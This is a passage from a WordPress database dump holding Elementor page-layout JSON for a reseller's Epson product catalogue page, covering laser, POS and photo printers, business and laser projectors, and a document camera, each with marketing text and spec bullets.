PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7902,3472,'_elementor_version','2.5.14'),(7906,3473,'_elementor_edit_mode','builder'),(7907,3473,'_elementor_template_type','post'),(7908,3473,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart 